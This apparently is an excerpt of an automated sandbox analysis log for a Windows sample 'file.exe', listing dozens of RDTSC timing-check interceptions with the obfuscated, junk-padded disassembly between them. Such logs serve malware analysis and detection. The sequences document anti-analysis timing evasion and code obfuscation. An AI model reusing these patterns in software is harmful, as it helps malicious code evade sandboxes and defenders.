              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51B06B7 second address: 51B06BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B06BD second address: 51B06D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 movsx ebx, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov esi, eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B06D1 second address: 51B06D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A003F second address: 51A007A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 mov ebx, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c movsx edi, ax 0x0000000f movzx esi, dx 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 mov bx, D25Ch 0x00000019 push edi 0x0000001a push ecx 0x0000001b pop edx 0x0000001c pop ecx 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 jmp 00007F65E53D48C3h 0x00000025 push FFFFFFFEh 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A007A second address: 51A0095 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9527h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A0095 second address: 51A00C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 012D7E59h 0x0000000e pushad 0x0000000f jmp 00007F65E53D48BDh 0x00000014 push eax 0x00000015 push edx 0x00000016 mov cl, 02h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A00C9 second address: 51A00CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A00CD second address: 51A00F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 7483E011h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F65E53D48C1h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A00F0 second address: 51A0105 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A0105 second address: 51A0132 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F65E53D48B9h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F65E53D48BDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A0132 second address: 51A0145 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, C922h 0x00000007 mov esi, ebx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A0145 second address: 51A0149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A0149 second address: 51A014F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A014F second address: 51A0162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65E53D48BFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A0162 second address: 51A01F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d mov bh, ah 0x0000000f jmp 00007F65E53D9527h 0x00000014 popad 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 movsx edx, cx 0x0000001b movzx esi, di 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 jmp 00007F65E53D951Ah 0x00000028 pop eax 0x00000029 pushad 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F65E53D951Ch 0x00000031 add cx, CDA8h 0x00000036 jmp 00007F65E53D951Bh 0x0000003b popfd 0x0000003c mov bx, cx 0x0000003f popad 0x00000040 movzx esi, di 0x00000043 popad 0x00000044 mov eax, dword ptr fs:[00000000h] 0x0000004a jmp 00007F65E53D9527h 0x0000004f nop 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 jmp 00007F65E53D951Bh 0x00000058 mov ah, EDh 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A01F9 second address: 51A023E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F65E53D48C7h 0x00000009 and ecx, 69D8F5AEh 0x0000000f jmp 00007F65E53D48C9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A023E second address: 51A0244 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A0244 second address: 51A02F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F65E53D48BBh 0x00000009 sbb cl, FFFFFFBEh 0x0000000c jmp 00007F65E53D48C9h 0x00000011 popfd 0x00000012 mov ebx, esi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 nop 0x00000018 pushad 0x00000019 push esi 0x0000001a push edi 0x0000001b pop eax 0x0000001c pop edi 0x0000001d movzx eax, dx 0x00000020 popad 0x00000021 sub esp, 18h 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F65E53D48C9h 0x0000002b sbb cx, 2756h 0x00000030 jmp 00007F65E53D48C1h 0x00000035 popfd 0x00000036 mov bx, ax 0x00000039 popad 0x0000003a xchg eax, ebx 0x0000003b pushad 0x0000003c call 00007F65E53D48C8h 0x00000041 pop ecx 0x00000042 pushad 0x00000043 push edx 0x00000044 pop eax 0x00000045 pushad 0x00000046 popad 0x00000047 popad 0x00000048 popad 0x00000049 push eax 0x0000004a jmp 00007F65E53D48C4h 0x0000004f xchg eax, ebx 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A02F5 second address: 51A02FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 2EA5169Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A02FF second address: 51A031E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A031E second address: 51A0322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A0322 second address: 51A0328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A0328 second address: 51A0337 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65E53D951Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A0337 second address: 51A03D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov dx, 37C2h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F65E53D48C9h 0x00000018 or si, 3F96h 0x0000001d jmp 00007F65E53D48C1h 0x00000022 popfd 0x00000023 mov esi, 6A04D407h 0x00000028 popad 0x00000029 popad 0x0000002a xchg eax, esi 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F65E53D48C8h 0x00000032 add esi, 30C69EE8h 0x00000038 jmp 00007F65E53D48BBh 0x0000003d popfd 0x0000003e mov esi, 785A26DFh 0x00000043 popad 0x00000044 xchg eax, edi 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F65E53D48BCh 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A03D9 second address: 51A03E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D951Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A03E8 second address: 51A043B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F65E53D48C1h 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 call 00007F65E53D48BCh 0x00000016 mov esi, 53E391A1h 0x0000001b pop eax 0x0000001c mov bl, 92h 0x0000001e popad 0x0000001f mov eax, dword ptr [75AF4538h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov eax, edi 0x00000029 mov esi, edi 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A043B second address: 51A04BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c pushad 0x0000000d mov edx, eax 0x0000000f pushfd 0x00000010 jmp 00007F65E53D951Ah 0x00000015 add ax, DAC8h 0x0000001a jmp 00007F65E53D951Bh 0x0000001f popfd 0x00000020 popad 0x00000021 xor eax, ebp 0x00000023 jmp 00007F65E53D951Fh 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F65E53D951Bh 0x00000032 add cx, 01BEh 0x00000037 jmp 00007F65E53D9529h 0x0000003c popfd 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A04BC second address: 51A04C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A04C1 second address: 51A04D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F65E53D951Dh 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A04D4 second address: 51A04F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F65E53D48C6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A04F6 second address: 51A0505 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D951Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A0505 second address: 51A050B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A050B second address: 51A050F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A058F second address: 51A0593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A0593 second address: 51A05EB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 test ecx, ecx 0x00000009 jmp 00007F65E53D951Dh 0x0000000e jns 00007F65E53D9536h 0x00000014 jmp 00007F65E53D951Eh 0x00000019 add eax, ecx 0x0000001b jmp 00007F65E53D9520h 0x00000020 mov ecx, dword ptr [ebp+08h] 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F65E53D9527h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51A05EB second address: 51A0615 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 call 00007F65E53D48BBh 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test ecx, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F65E53D48C2h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51901BD second address: 51901C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51901C2 second address: 5190244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F65E53D48BDh 0x0000000a or cx, 7096h 0x0000000f jmp 00007F65E53D48C1h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a mov ecx, edi 0x0000001c mov edx, 3D595D1Eh 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F65E53D48BBh 0x0000002a jmp 00007F65E53D48C3h 0x0000002f popfd 0x00000030 push eax 0x00000031 push edx 0x00000032 pushfd 0x00000033 jmp 00007F65E53D48C6h 0x00000038 add ax, 7A48h 0x0000003d jmp 00007F65E53D48BBh 0x00000042 popfd 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5190244 second address: 519028E instructions: 0x00000000 rdtsc 0x00000002 mov ax, 3DBFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007F65E53D9520h 0x00000011 pushfd 0x00000012 jmp 00007F65E53D9522h 0x00000017 sub si, 9FD8h 0x0000001c jmp 00007F65E53D951Bh 0x00000021 popfd 0x00000022 popad 0x00000023 sub esp, 2Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 519028E second address: 5190294 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5190294 second address: 51902BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 mov eax, 56B61E13h 0x0000000d mov ecx, 4FDA886Fh 0x00000012 popad 0x00000013 mov dword ptr [esp], ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F65E53D9521h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5190399 second address: 519039F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 519039F second address: 51903A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51903A3 second address: 51903A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51903A7 second address: 51903B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 inc ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51903B6 second address: 51903BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51903BA second address: 51903C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51903C0 second address: 519042A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F65E53D48C1h 0x00000009 or ax, 9526h 0x0000000e jmp 00007F65E53D48C1h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F65E53D48C0h 0x0000001a or ax, F6C8h 0x0000001f jmp 00007F65E53D48BBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 test al, al 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F65E53D48C5h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 519042A second address: 519049A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov ecx, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F65E53D96B4h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F65E53D951Bh 0x00000017 and si, 526Eh 0x0000001c jmp 00007F65E53D9529h 0x00000021 popfd 0x00000022 movzx esi, bx 0x00000025 popad 0x00000026 lea ecx, dword ptr [ebp-14h] 0x00000029 jmp 00007F65E53D9523h 0x0000002e mov dword ptr [ebp-14h], edi 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F65E53D9525h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 519049A second address: 519049F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51904BC second address: 51904C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51904C2 second address: 51904F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov di, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F65E53D48BAh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov dh, ah 0x00000017 jmp 00007F65E53D48C9h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51904F8 second address: 519053F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F65E53D9527h 0x00000008 pop ecx 0x00000009 jmp 00007F65E53D9529h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F65E53D951Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 519053F second address: 5190545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51905C2 second address: 5190607 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F6655CE73E7h 0x0000000e pushad 0x0000000f mov edx, ecx 0x00000011 mov ax, 44D5h 0x00000015 popad 0x00000016 mov ebx, dword ptr [ebp+08h] 0x00000019 jmp 00007F65E53D9520h 0x0000001e lea eax, dword ptr [ebp-2Ch] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F65E53D9527h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5190607 second address: 51906C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F65E53D48BFh 0x00000008 pop ecx 0x00000009 mov edi, 42266E4Ch 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esp 0x00000012 jmp 00007F65E53D48C0h 0x00000017 mov dword ptr [esp], esi 0x0000001a jmp 00007F65E53D48C0h 0x0000001f nop 0x00000020 jmp 00007F65E53D48C0h 0x00000025 push eax 0x00000026 pushad 0x00000027 mov bh, BDh 0x00000029 jmp 00007F65E53D48BAh 0x0000002e popad 0x0000002f nop 0x00000030 pushad 0x00000031 pushad 0x00000032 push ecx 0x00000033 pop edx 0x00000034 mov dl, cl 0x00000036 popad 0x00000037 push edx 0x00000038 pushfd 0x00000039 jmp 00007F65E53D48C0h 0x0000003e sub al, 00000058h 0x00000041 jmp 00007F65E53D48BBh 0x00000046 popfd 0x00000047 pop ecx 0x00000048 popad 0x00000049 push ecx 0x0000004a jmp 00007F65E53D48C4h 0x0000004f mov dword ptr [esp], ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F65E53D48C7h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51906FA second address: 5190701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, 20h 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5190701 second address: 5180DA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov esi, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test esi, esi 0x0000000c jmp 00007F65E53D48C3h 0x00000011 je 00007F6655CE27EBh 0x00000017 xor eax, eax 0x00000019 jmp 00007F65E53ADFEAh 0x0000001e pop esi 0x0000001f pop edi 0x00000020 pop ebx 0x00000021 leave 0x00000022 retn 0004h 0x00000025 nop 0x00000026 cmp eax, 00000000h 0x00000029 setne cl 0x0000002c xor ebx, ebx 0x0000002e test cl, 00000001h 0x00000031 jne 00007F65E53D48B7h 0x00000033 jmp 00007F65E53D4A2Bh 0x00000038 call 00007F65E9B5E8CDh 0x0000003d mov edi, edi 0x0000003f jmp 00007F65E53D48BCh 0x00000044 xchg eax, ebp 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F65E53D48C7h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5180DA0 second address: 5180DB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65E53D9524h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5180DB8 second address: 5180DBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5180DBC second address: 5180DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F65E53D951Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5190B80 second address: 5190B86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5190B86 second address: 5190B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5190B8A second address: 5190B8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5190B8E second address: 5190BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b call 00007F65E53D9525h 0x00000010 mov edx, esi 0x00000012 pop esi 0x00000013 pushfd 0x00000014 jmp 00007F65E53D951Dh 0x00000019 or cx, E606h 0x0000001e jmp 00007F65E53D9521h 0x00000023 popfd 0x00000024 popad 0x00000025 cmp dword ptr [75AF459Ch], 05h 0x0000002c pushad 0x0000002d push esi 0x0000002e pushad 0x0000002f popad 0x00000030 pop edi 0x00000031 push eax 0x00000032 push edx 0x00000033 mov ebx, esi 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5190C9A second address: 5190CBA instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 0574871Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, ecx 0x0000000b popad 0x0000000c call 00007F6655CD9782h 0x00000011 push 75A92B70h 0x00000016 push dword ptr fs:[00000000h] 0x0000001d mov eax, dword ptr [esp+10h] 0x00000021 mov dword ptr [esp+10h], ebp 0x00000025 lea ebp, dword ptr [esp+10h] 0x00000029 sub esp, eax 0x0000002b push ebx 0x0000002c push esi 0x0000002d push edi 0x0000002e mov eax, dword ptr [75AF4538h] 0x00000033 xor dword ptr [ebp-04h], eax 0x00000036 xor eax, ebp 0x00000038 push eax 0x00000039 mov dword ptr [ebp-18h], esp 0x0000003c push dword ptr [ebp-08h] 0x0000003f mov eax, dword ptr [ebp-04h] 0x00000042 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000049 mov dword ptr [ebp-08h], eax 0x0000004c lea eax, dword ptr [ebp-10h] 0x0000004f mov dword ptr fs:[00000000h], eax 0x00000055 ret 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F65E53D48BDh 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5190CBA second address: 5190CC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5190CC0 second address: 5190CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5190CC4 second address: 5190CC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
